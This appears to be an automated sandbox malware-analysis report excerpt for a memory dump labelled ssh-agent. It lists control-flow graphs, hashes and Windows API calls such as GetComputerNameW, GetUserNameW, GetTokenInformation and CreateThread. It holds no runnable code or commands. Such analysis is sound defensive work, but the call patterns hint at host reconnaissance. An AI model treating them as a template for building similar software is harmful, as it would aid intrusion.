                                        control_flow_graph 290 d252a0-d253fe 295 d25404-d2540e 290->295 296 d60d4c-d60d4e 290->296 297 d25424 295->297 298 d2542a 297->298 299 d2539b 297->299 298->299 302 d25430-d25443 298->302 300 d25413-d25419 299->300 301 d2539d-d253a1 299->301 303 d252b0-d252b5 301->303 304 d253a7 301->304 304->303 305 d253ad 304->305 306 d253f3-d253f9 305->306 307 d253af 305->307 311 d25355 306->311 312 d2532a 306->312 308 d253e0-d253f1 307->308 308->300 308->306 316 d252d1-d252e7 311->316 317 d252e8-d25363 311->317 312->311 313 d2532c-d2533f 312->313 315 d2536b-d25390 313->315 324 d25392-d2539a 315->324 325 d253c3 315->325 316->317 322 d253d1-d253d5 317->322 323 d25365 317->323 322->301 326 d253d7 322->326 323->322 327 d25367-d25369 323->327 324->301 326->308 328 d25342-d25345 326->328 327->315 329 d25400-d2540e 328->329 330 d2534b 328->330 329->297 330->329 331 d25351-d25353 330->331 331->311
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 00D253C4
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: fceda80f30eac26b33ac54387c4505d91f0ee0f1ddc90312ac0a38c556ee7199
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: D041D67140DEB58FD72692247464EB07BD0AB323EEF5D15D6D4C2860EED1B89C82933A
                                        Function 00D40080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 d40080-d40286 2 d4028c 0->2 3 d40099-d40575 0->3 5 d40445 2->5 7 d40155 3->7 8 d4057b 3->8 5->3 6 d4044b-d40457 5->6 11 d40458-d40472 GetComputerNameW 6->11 10 d402ef-d40495 call d2e050 * 2 7->10 8->7 9 d40581-d40587 8->9 12 d4058b 9->12 10->11 55 d4043e 10->55 18 d4024c-d40253 11->18 19 d403ee-d403f4 11->19 16 d40181 VirtualFree 12->16 17 d4058c-d40591 12->17 25 d401a8-d402ac call d57164 16->25 20 d40597 17->20 21 d404ab-d404af 17->21 22 d40255 18->22 23 d401e6 18->23 33 d400da-d4023f 19->33 34 d403fa 19->34 20->21 26 d4059d 20->26 46 d404c7 21->46 27 d402d3 22->27 30 d402b1-d402be 23->30 31 d401ec-d40313 call d5715c 23->31 25->30 26->21 27->23 42 d402d9 27->42 39 d402c4 30->39 40 d403bf-d403d9 GetUserNameW 30->40 52 d40318-d4031e 31->52 33->18 50 d40241-d4024a 33->50 34->33 43 d40400 34->43 39->40 48 d402ca 39->48 49 d40331 40->49 42->10 51 d4b1ee-d4b49f 43->51 58 d404cc-d404e6 call d59970 GetComputerNameW 46->58 48->27 53 d40337 49->53 54 d40171 49->54 50->18 50->30 56 d40324 52->56 57 d40568-d4056b 52->57 53->54 61 d4033d 53->61 59 d40173 54->59 60 d4013f-d40146 54->60 55->5 56->57 63 d4032a 56->63 57->58 70 d40131 58->70 71 d404ec-d40514 58->71 65 d40230 59->65 60->12 66 d405d0-d405d9 61->66 63->49 65->46 68 d40236-d405c2 65->68 66->51 68->46 74 d405c8-d405c9 68->74 72 d40137 70->72 73 d40089-d4008c 70->73 71->57 72->73 75 d4013d 72->75 73->25 77 d40092 73->77 74->66 75->16 75->60 77->25 78 d40098 77->78 78->3
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: 622fd97cf28733f149b5f87a2e1fcaf5669d4925da9c9bb40f70e017797dff8e
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: C0D12731518F098BC728EF58D8457EABBE1FBA0310F18461FDA86C7164DA74DA458BD2
                                        Function 00D28070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 d28070-d2817e 81 d28180 79->81 82 d2813d-d281a5 79->82 83 d28184 81->83 84 d2815f 81->84 96 d281a7 82->96 97 d281bd-d281ca 82->97 85 d28186 CloseHandle 83->85 86 d2818c-d28192 83->86 84->82 88 d28161 84->88 85->86 90 d28194 86->90 91 d28115-d28118 86->91 89 d28163-d28170 call d57164 88->89 89->85 102 d28172 89->102 90->91 98 d2819a 90->98 94 d280a7 91->94 95 d28119-d2811a 91->95 95->94 101 d2811c 95->101 105 d280f3 97->105 106 d281d0 97->106 99 d2813c 98->99 99->83 103 d2820f 101->103 102->86 107 d28215-d2821e 103->107 108 d2808e-d28096 103->108 109 d280f5 105->109 110 d2808c 105->110 115 d280c3 106->115 116 d281fe-d28201 GetTokenInformation 106->116 107->108 118 d28224 107->118 108->83 108->94 109->110 117 d28077 109->117 110->108 115->116 121 d280c9 115->121 116->103 130 d281b7 116->130 120 d281d7-d281de call d5715c 117->120 119 d28226 118->119 118->120 119->120 123 d28228-d282ee call d25d90 119->123 128 d281e3-d281e6 120->128 126 d280ca-d280d8 GetTokenInformation 121->126 145 d282f0 123->145 146 d2830c-d2831e 123->146 129 d2810f 126->129 128->126 144 d28089 128->144 131 d28111 129->131 132 d2812d 129->132 130->103 135 d281b9-d281bb 130->135 131->132 137 d28113 131->137 139 d28133 132->139 140 d280a8 132->140 135->97 137->91 139->99 143 d281ed-d281f0 139->143 142 d280aa-d280ad 140->142 142->89 147 d280b3-d28203 142->147 148 d281f6 143->148 149 d280da-d280f1 143->149 144->126 150 d2808b 144->150 145->146 151 d282f2 145->151 154 d28320 146->154 155 d282a1-d282ba call d25d90 call d2ec00 146->155 147->89 158 d28209 147->158 148->149 153 d281fc 148->153 149->142 150->110 157 d282f7-d282fc call d25d90 151->157 153->116 156 d28322 154->156 154->157 155->154 156->157 161 d28324-d28326 156->161 169 d28302 157->169 170 d28253-d28265 call d41280 157->170 164 d28328 161->164 172 d28335 164->172 173 d282df-d2832b 164->173 169->170 175 d28308-d2830a 169->175 170->164 180 d2826b 170->180 178 d2826e-d28285 172->178 173->172 179 d2832d-d28331 173->179 175->146 181 d28287 178->181 182 d2829b-d2829d 178->182 179->172 180->178 183 d28239 180->183 184 d2824c 181->184 182->155 183->164 185 d2823f-d28243 183->185 184->182 186 d2824e-d28252 184->186 185->157 185->184 186->178
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction ID: 288f98f44e10b1ea52facbc149525655efd9c97d1b8a38342a663c8192100ce0
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: 0E61FF3050FB75DFD76A8B28B8142356AA0FB75358F6C025AE486C31E0CE249C59B376
                                        Function 00D25910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 d25910-d25912 188 d25950-d25968 187->188 189 d25915-d25928 call d59970 187->189 188->189 191 d2596a 188->191 195 d259b8 call d40df0 189->195 193 d25970-d2597b 191->193 194 d2592f 191->194 197 d259d4 193->197 198 d2597d 193->198 194->189 196 d25931-d3072c 194->196 206 d259bd-d259c2 call d25d90 195->206 204 d30732-d30738 196->204 205 d30806-d30809 196->205 201 d2593b-d25a15 call d411a0 197->201 202 d259d8 197->202 198->197 203 d2597f-d25981 198->203 213 d259d9-d259de call d52190 202->213 208 d25983-d25a38 203->208 210 d30800 204->210 211 d3073e 204->211 223 d3079d-d307a6 205->223 217 d259c7-d259ce 206->217 221 d25994-d2599c 208->221 222 d25a3e 208->222 210->205 220 d306b3-d306b7 210->220 211->210 216 d30744-d30774 211->216 213->221 241 d259e0 213->241 234 d306d5-d306d9 216->234 235 d3077a-d3081c 216->235 229 d259d0 217->229 230 d25a1a-d25a26 217->230 220->223 228 d306bd 220->228 226 d25a02 221->226 227 d2599e-d259f7 221->227 224 d25a2c-d25a34 222->224 231 d30791-d30793 223->231 232 d307a8 223->232 224->213 226->193 227->226 228->223 237 d306c3-d307fe 228->237 229->230 239 d259d2-d259de 229->239 230->224 242 d259a1-d259b5 call d25e10 230->242 238 d307ca-d307cc 231->238 232->231 240 d307aa 232->240 246 d306db 234->246 247 d306df 234->247 235->223 237->210 239->221 239->241 240->238 241->221 248 d259e2-d259ec 241->248 242->195 257 d25a08-d25a0b 242->257 246->247 250 d306dd 246->250 247->223 253 d25a62-d25a6e 248->253 254 d259ee-d259ef 248->254 250->247 258 d3c0cc 250->258 255 d25a70 253->255 256 d25a75-d25ab3 call d41280 253->256 254->208 259 d259f1 254->259 255->256 262 d25a72 255->262 277 d25ab5 256->277 278 d25abb-d25ac9 256->278 257->221 264 d25a0d 257->264 260 d3c0e8-d3c102 258->260 261 d3c0ce-d3c0d0 258->261 259->189 265 d3c0d2-d3c0df 260->265 266 d3c104 260->266 261->265 262->256 269 d25932 264->269 270 d25991 264->270 274 d3c0e7 265->274 266->265 266->274 270->269 273 d25993 270->273 273->221 277->278 279 d25ab7-d25ab9 277->279 280 d25af2-d25af5 278->280 279->278 284 d25ad5 280->284 285 d25adb-d25adc 280->285 284->285 286 d25ad7-d25ad9 284->286 287 d25ae2 285->287 288 d25a45-d25a46 285->288 286->285 287->288 289 d25ae8 287->289 289->280
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: a613de5ca0ed84d3b17995f8cfa5bdebf62695cb2f036c7edfb8275d592f45ed
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 22F17A2071CE588FC669A72C78517BAB7D1EB99314F5C419EE08AC329ACD34DC4687B2
                                        Function 00D25B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 332 d25b42-d25b47 call d25d90 334 d25b4c-d25b52 332->334 336 d25c42-d25c62 call d41280 334->336 337 d25b0d 334->337 355 d25c26 336->355 356 d25c14-d25cc0 336->356 337->336 338 d25b13 337->338 340 d25c8f-d25c96 338->340 342 d25c98-d25c9a 340->342 343 d25c29 340->343 347 d25c9c 342->347 344 d25cc2-d25cc9 call d252a0 343->344 345 d25c2f-d25c36 343->345 357 d25ccb 344->357 358 d25c69 344->358 345->344 349 d25c3c 345->349 353 d25bfa 347->353 354 d25d0e-d25d18 347->354 349->332 353->354 359 d25c00 353->359 360 d25d54 354->360 361 d25d1a 354->361 355->356 363 d25c28 355->363 356->344 357->347 364 d25ccd 357->364 365 d25b68-d25d75 358->365 366 d25c6f 358->366 359->356 367 d25d4b-d25d52 361->367 363->343 364->347 368 d25ccf-d25ce4 CreateThread 364->368 366->365 370 d25c75 366->370 367->360 371 d25d45-d25d47 367->371 375 d25c01-d25c05 368->375 376 d25cea 368->376 370->340 373 d25d49 371->373 374 d25d5f 371->374 373->367 373->374 378 d25d65 374->378 380 d25c20-d25c68 375->380 383 d25d37-d25d41 375->383 376->375 377 d25cf0-d25cf6 376->377 377->380 378->378 383->367 384 d25d43 383->384 384->360
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 68dbe82540a080d2343ba15e938d8aa89ee6c947a01b9c8d4575f7319fa090c1
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 7021913020CF658FCB699B18B458F7467A1EBB531DF5C02A69487CE19EEA34CC44A735
                                        Function 00D25B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 385 d25b09-d25d01 390 d25d07 385->390 391 d25bb4-d25ce4 CreateThread 385->391 390->391 392 d25d0d 390->392 395 d25c01-d25c05 391->395 396 d25cea 391->396 399 d25c20-d25c68 395->399 402 d25d37-d25d41 395->402 396->395 397 d25cf0-d25cf6 396->397 397->399 403 d25d43 402->403 404 d25d4b-d25d52 402->404 405 d25d54 403->405 404->405 406 d25d45-d25d47 404->406 407 d25d49 406->407 408 d25d5f 406->408 407->404 407->408 409 d25d65 408->409 409->409
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: f12e37f06289d2b6cbaefb9f27bade6f7f641c61a25645262781a9b58509ffd6
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: E401803010DF668FDB555624BC19F7967A0AB7032CF2902AB84C7CA09DEAB58900B772
                                        Function 00D25B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 d25b87-d25d01 CreateThread 414 d25d07 410->414 415 d25bb4-d25ce4 CreateThread 410->415 414->415 416 d25d0d 414->416 419 d25c01-d25c05 415->419 420 d25cea 415->420 423 d25c20-d25c68 419->423 426 d25d37-d25d41 419->426 420->419 421 d25cf0-d25cf6 420->421 421->423 427 d25d43 426->427 428 d25d4b-d25d52 426->428 429 d25d54 427->429 428->429 430 d25d45-d25d47 428->430 431 d25d49 430->431 432 d25d5f 430->432 431->428 431->432 433 d25d65 432->433 433->433
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 2980f34a10accb7ba40a6e1b218b224194288969276f6a3140c6a966fc69707a
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: CAE0863060DB544FDB599F2478117193AE5EBA8318F1901CFC48ADB1D9DB79490547A2
                                        Function 00D2599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 434 d2599b-d2599e 435 d259f7 434->435 436 d259b8 call d40df0 434->436 438 d25a02 435->438 439 d259bd-d259c2 call d25d90 436->439 442 d259d4 438->442 443 d2597d 438->443 444 d259c7-d259ce 439->444 445 d2593b-d25a15 call d411a0 442->445 446 d259d8 442->446 443->442 447 d2597f-d25981 443->447 448 d259d0 444->448 449 d25a1a-d25a26 444->449 453 d259d9-d259de call d52190 446->453 451 d25983-d25a38 447->451 448->449 454 d259d2-d259de 448->454 456 d259a1-d259b5 call d25e10 449->456 457 d25a2c-d25a34 449->457 461 d25994-d2599c 451->461 462 d25a3e 451->462 453->461 468 d259e0 453->468 454->461 454->468 456->436 467 d25a08-d25a0b 456->467 457->453 461->438 463 d2599e 461->463 462->457 463->435 467->461 469 d25a0d 467->469 468->461 470 d259e2-d259ec 468->470 476 d25932 469->476 477 d25991 469->477 472 d25a62-d25a6e 470->472 473 d259ee-d259ef 470->473 474 d25a70 472->474 475 d25a75-d25ab3 call d41280 472->475 473->451 478 d259f1 call d59970 473->478 474->475 480 d25a72 474->480 488 d25ab5 475->488 489 d25abb-d25ac9 475->489 477->476 479 d25993 477->479 478->436 479->461 480->475 488->489 490 d25ab7-d25ab9 488->490 491 d25af2-d25af5 489->491 490->489 495 d25ad5 491->495 496 d25adb-d25adc 491->496 495->496 497 d25ad7-d25ad9 495->497 498 d25ae2 496->498 499 d25a45-d25a46 496->499 497->496 498->499 500 d25ae8 498->500 500->491
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: d50485cc0ef8101089b389b03b442d5003e906eb3e8e0509177a6a061e574247
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 5501F76050EE70CFD61AA7187002E796551F7B633CF2C4156908AC709EC9349D849F71
                                        Function 00D28090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 501 d28090-d28096 502 d28184 501->502 503 d28186 CloseHandle 502->503 504 d2818c-d28192 502->504 503->504 505 d28194 504->505 506 d28115-d28118 504->506 505->506 509 d2819a 505->509 507 d280a7 506->507 508 d28119-d2811a 506->508 508->507 511 d2811c 508->511 510 d2813c 509->510 510->502 512 d2820f 511->512 513 d28215-d2821e 512->513 514 d2808e-d28096 512->514 513->514 516 d28224 513->516 514->502 514->507 517 d28226 516->517 518 d281d7-d281e6 call d5715c 516->518 517->518 519 d28228-d282ee call d25d90 517->519 528 d280ca-d2810f GetTokenInformation 518->528 529 d28089 518->529 530 d282f0 519->530 531 d2830c-d2831e 519->531 534 d28111 528->534 535 d2812d 528->535 529->528 533 d2808b 529->533 530->531 536 d282f2 530->536 537 d28320 531->537 538 d282a1-d282ba call d25d90 call d2ec00 531->538 539 d2808c 533->539 534->535 542 d28113 534->542 543 d28133 535->543 544 d280a8 535->544 541 d282f7-d282fc call d25d90 536->541 540 d28322 537->540 537->541 538->537 539->514 540->541 546 d28324-d28326 540->546 562 d28302 541->562 563 d28253-d28265 call d41280 541->563 542->506 543->510 549 d281ed-d281f0 543->549 547 d280aa-d280ad 544->547 551 d28328 546->551 552 d28163-d28170 call d57164 547->552 553 d280b3-d28203 547->553 554 d281f6 549->554 555 d280da-d280f1 549->555 565 d28335 551->565 566 d282df-d2832b 551->566 552->503 574 d28172 552->574 553->552 571 d28209 553->571 554->555 561 d281fc 554->561 555->547 569 d281fe-d28201 GetTokenInformation 561->569 562->563 570 d28308-d2830a 562->570 563->551 579 d2826b 563->579 577 d2826e-d28285 565->577 566->565 578 d2832d-d28331 566->578 569->512 586 d281b7 569->586 570->531 574->504 581 d28287 577->581 582 d2829b-d2829d 577->582 578->565 579->577 584 d28239 579->584 585 d2824c 581->585 582->538 584->551 587 d2823f-d28243 584->587 585->582 588 d2824e-d28252 585->588 586->512 589 d281b9-d281ca 586->589 587->541 587->585 588->577 592 d280f3 589->592 593 d281d0 589->593 592->539 594 d280f5 592->594 593->569 598 d280c3 593->598 594->539 599 d28077 594->599 598->569 600 d280c9 598->600 599->518 600->528
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: c82aa0dfa8307d9d6bf1236bceec69c75d403b6ced8729b64ffe1db0ff20360c
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: D9C08C6012FF3296B23B03487C0B0B02650823275EB0C00068C42C02E0DD04CE7330B7
                                        Function 00D2817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 601 d2817f 602 d28184 601->602 603 d28186 CloseHandle 602->603 604 d2818c-d28192 602->604 603->604 605 d28194 604->605 606 d28115-d28118 604->606 605->606 609 d2819a 605->609 607 d280a7 606->607 608 d28119-d2811a 606->608 608->607 611 d2811c 608->611 610 d2813c 609->610 610->602 612 d2820f 611->612 613 d28215-d2821e 612->613 614 d2808e-d28096 612->614 613->614 616 d28224 613->616 614->602 614->607 617 d28226 616->617 618 d281d7-d281e6 call d5715c 616->618 617->618 619 d28228-d282ee call d25d90 617->619 628 d280ca-d2810f GetTokenInformation 618->628 629 d28089 618->629 630 d282f0 619->630 631 d2830c-d2831e 619->631 634 d28111 628->634 635 d2812d 628->635 629->628 633 d2808b 629->633 630->631 636 d282f2 630->636 637 d28320 631->637 638 d282a1-d282ba call d25d90 call d2ec00 631->638 639 d2808c 633->639 634->635 642 d28113 634->642 643 d28133 635->643 644 d280a8 635->644 641 d282f7-d282fc call d25d90 636->641 640 d28322 637->640 637->641 638->637 639->614 640->641 646 d28324-d28326 640->646 662 d28302 641->662 663 d28253-d28265 call d41280 641->663 642->606 643->610 649 d281ed-d281f0 643->649 647 d280aa-d280ad 644->647 651 d28328 646->651 652 d28163-d28170 call d57164 647->652 653 d280b3-d28203 647->653 654 d281f6 649->654 655 d280da-d280f1 649->655 665 d28335 651->665 666 d282df-d2832b 651->666 652->603 674 d28172 652->674 653->652 671 d28209 653->671 654->655 661 d281fc 654->661 655->647 669 d281fe-d28201 GetTokenInformation 661->669 662->663 670 d28308-d2830a 662->670 663->651 679 d2826b 663->679 677 d2826e-d28285 665->677 666->665 678 d2832d-d28331 666->678 669->612 686 d281b7 669->686 670->631 674->604 681 d28287 677->681 682 d2829b-d2829d 677->682 678->665 679->677 684 d28239 679->684 685 d2824c 681->685 682->638 684->651 687 d2823f-d28243 684->687 685->682 688 d2824e-d28252 685->688 686->612 689 d281b9-d281ca 686->689 687->641 687->685 688->677 692 d280f3 689->692 693 d281d0 689->693 692->639 694 d280f5 692->694 693->669 698 d280c3 693->698 694->639 699 d28077 694->699 698->669 700 d280c9 698->700 699->618 700->628
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: a0144144e3b167a8b56b91501796dbed983e4b716bb8f6c48b22e398278a41dc
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 1AC092A055BB3987B13B2788BC0A0B135A04673B6AF0C4512ED06CA3F0DD588DB371B2